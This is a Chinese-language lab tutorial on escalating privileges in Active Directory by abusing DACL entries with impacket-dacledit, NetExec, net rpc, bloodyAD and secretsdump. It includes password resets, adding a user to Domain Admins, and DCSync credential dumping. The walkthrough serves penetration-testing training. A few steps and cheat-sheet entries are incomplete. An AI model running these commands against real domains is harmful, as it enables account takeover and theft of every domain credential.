Impacket-dacledit指南：AD权限配置错误导致的五大权限提升路径

导语：DACL（自主访问控制列表）是Microsoft Active Directory中最强大、也最容易被误解的组件之一。每个AD对象（用户、组、OU甚至域根）都携带包含DACL的安全描述符。当管理员错误配置这些ACE时，攻击者可以滥用它们提升权限、重置特权账户密码、复制域凭据，最终拿下整个域——全程不需要任何传统漏洞利用。

DACL基础：理解Active Directory中的权限机制

什么是DACL？

DACL是每个AD对象安全描述符的组成部分，包含零个或多个ACE，每个ACE指定：

安全主体（用户、组、计算机），由SID标识
访问掩码，定义允许的操作（如ReadProperty、ControlAccess、WriteDACL、GenericAll）
ACE类型：ACCESS_ALLOWED或ACCESS_DENY
可选的对象类型GUID，将权限缩小到特定扩展权限或属性

为什么DACL对攻击者至关重要

与传统漏洞不同，DACL滥用利用的是合法的Windows功能。如果攻击者可以写入对象的DACL，他可以静默地为自己授予任何权限——而不触发大多数安全工具的告警。危险的权限包括：

ForceChangePassword（User-Force-Change-Password GUID）
WriteDACL / FullControl（对组的完全控制）
WriteMembers（组 membership的写入权限）
DCSync权限（域根上的DS-Replication-Get-Changes + DS-Replication-Get-Changes-All）

技术一：ForceChangePassword（用户→用户权限提升）

概述

User-Force-Change-Password扩展权限（GUID: 00299570-246d-11d0-a768-00aa006e0529）允许安全主体在不知道原密码的情况下更改另一用户的密码。这种错误配置在AD环境中很常见——helpdesk或支持账户被授予密码重置权限，但范围划得过大。

步骤1：授予jerry对tom的ForceChangePassword权限

使用管理员凭据，将ForceChangePassword权限写入用户对象CN=tom,CN=Users,DC=ignite,DC=local的DACL，授予主体jerry：

impacket-dacledit -action write -rights ResetPassword -principal jerry -target-dn "CN=tom,CN=Users,DC=ignite,DC=local" 'ignite.local/administrator:Ignite@987' -dc-ip 192.168.1.11

步骤2：验证ACE已写入

该命令显示用户jerry在ignite.local域中对对象tom拥有特定的委托权限：

impacket-dacledit -principal jerry -target 'tom' -dc-ip 192.168.1.11 ignite.local/jerry:Password@1

步骤3：更改tom的密码并验证

NetExec的change-password模块执行密码重置——不需要知道tom的当前密码：

nxc smb 192.168.1.11 -u jerry -p Password@1 -M change-password -o USER=tom NEWPASS=Admin@123

nxc smb 192.168.1.11 -u jerry -p Admin@123

步骤4：恢复DACL

演示漏洞后，恢复原始DACL：

impacket-dacledit -action restore -file dacledit-20260328-141554.bak 'ignite.local/administrator:Ignite@987' -dc-ip 192.168.1.11

技术二：Domain Admins组的FullControl→组成员身份

概述

如果攻击者获得组对象的FullControl（等价于GenericAll），他可以直接操作组成员、更改组的DACL，或对该对象执行任何其他操作。获得Domain Admins组的FullControl相当于通往域控的路径。

步骤1：授予raaz对Domain Admins的FullControl

impacket-dacledit -action write -rights FullControl -principal raaz -target-dn "CN=Domain Admins,CN=Users,DC=ignite,DC=local" 'ignite.local/administrator:Ignite@987' -dc-ip 192.168.1.11

步骤2：验证ACE

以raaz身份读取Domain Admins组DACL，确认FullControl（GenericAll等价）通过大量ACCESS_ALLOWED_OBJECT_ACE条目存在：

impacket-dacledit -action read -target-dn "CN=Domain Admins,CN=Users,DC=ignite,DC=local" 'ignite.local/raaz:Password@1' -dc-ip 192.168.1.11

步骤3：添加raaz到Domain Admins

拥有FullControl后，raaz可以通过net rpc直接将自己添加到组：

net rpc group addmem "Domain Admins" "raaz" -U ignite.local/raaz%'Password@1' -S 192.168.1.11

确认组成员身份：

net rpc group members "Domain Admins" -U "ignite.local/raaz%Password@1" -S 192.168.1.11

步骤4：恢复

演示漏洞后，恢复原始DACL：

impacket-dacledit -action restore -file dacledit-20260328-142121.bak 'ignite.local/administrator:Ignite@987' -dc-ip 192.168.1.11

技术三：通过域根DACL滥用实现DCSync

概述

DCSync是一种滥用MS-DRSR（目录复制服务远程协议）的技术，向域控制器请求凭据数据复制——就像另一台域控制器请求复制一样。域根上需要两个扩展权限：

DS-Replication-Get-Changes（GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2）
DS-Replication-Get-Changes-All（GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2）

将这两个权限授予非特权用户，允许其dump所有域凭据包括krbtgt哈希——从而实现黄金票据攻击。

步骤1：授予kinjal DCSync权限

本实验演示了两种方法。第一种使用命名备份文件便于清晰追踪：

impacket-dacledit ignite.local/administrator:'Ignite@987' -action write -rights DCSync -principal kinjal -target-dn 'DC=ignite,DC=local' -dc-ip 192.168.1.11

步骤2：验证DCSync ACE

回读kinjal在域根上的ACE，确认两个复制权限都存在：

impacket-dacledit -principal kinjal -target-dn "DC=ignite,DC=local" -dc-ip 192.168.1.11 ignite.local/kinjal:Password@1

步骤3：执行DCSync——转储所有域哈希

在复制权限就位后，impacket-secretsdump通过DRSUAPI执行完整凭据dump（注意：DCERPC RemoteOperations失败，回退到DRSUAPI——这是正常的）：

impacket-secretsdump ignite.local/kinjal:Password@1@192.168.1.11

步骤4：恢复DCSync权限

演示漏洞后，恢复原始DACL：

impacket-dacledit -action restore -file dacledit-20260328-143314.bak 'ignite.local/administrator:Ignite@987' -dc-ip 192.168.1.11

技术四：WriteMembers DACL滥用

概述

WriteMembers权限允许ankur账户向Domain Admins组添加或删除成员，而不需要完整的域管理员权限。这代表了一种持久化后门——即使ankur的组成员身份被撤销，底层DACL权限仍然存在，可重新提权。

步骤1：授予ankur对Domain Admins的WriteMembers

步骤2：验证WriteMember ACE

以ankur身份读取DACL，显示多个READ ACE（继承的基线）和新授予的WriteMember访问：

impacket-dacledit -action read -target-dn "CN=Domain Admins,CN=Users,DC=ignite,DC=local" 'ignite.local/ankur:Password@1' -dc-ip 192.168.1.11

步骤3：通过bloodyAD将ankur添加到Domain Admins

bloodyAD --host "192.168.1.11" -d "ignite.local" -u "ankur" -p "Password@1" add groupMember "Domain Admins" "ankur"

技术五：基于GUID的ACE写入

概述

不使用-rights关键字简写，impacket-dacledit支持使用-rights-guid通过原始扩展权限GUID写入ACE。这对于没有命名简写的权限或脚本化精确ACE添加很有用。

示例：通过GUID写入ForceChangePassword

直接指定User-Force-Change-Password GUID（00299570-246d-11d0-a768-00aa006e0529）：

impacket-dacledit -action write -rights-guid 00299570-246d-11d0-a768-00aa006e0529 -principal jerry -target-dn "CN=tom,CN=Users,DC=ignite,DC=local" 'ignite.local/administrator:Ignite@987' -dc-ip 192.168.1.11

使用-file选项（备份与恢复）

-file用于保存和恢复Active Directory权限，是安全ACL修改和恢复的关键选项：

impacket-dacledit ignite.local/administrator:'Ignite@987' -action write -rights DCSync -principal kinjal -target-dn 'DC=ignite,DC=local' -dc-ip 192.168.1.11 -file dcsync_backup.bak

演示漏洞后，恢复原始DACL：

impacket-dacledit -action restore -file dacledit-20260328-143314.bak 'ignite.local/administrator:Ignite@987' -dc-ip 192.168.1.11

Active Directory DACL权限——GUID速查表

权限名称	GUID	描述
ForceChangePassword	00299570-246d-11d0-a768-00aa006e0529	无需原密码重置用户密码
DS-Replication-Get-Changes	1131f6aa-9c07-11d1-f79f-00c04fc2dcd2	复制域凭据变更
DS-Replication-Get-Changes-All	1131f6ad-9c07-11d1-f79f-00c04fc2dcd2	完整域复制权限
WriteDACL	拒绝此操作	修改对象DACL
FullControl/GenericAll	所有权限	完全控制对象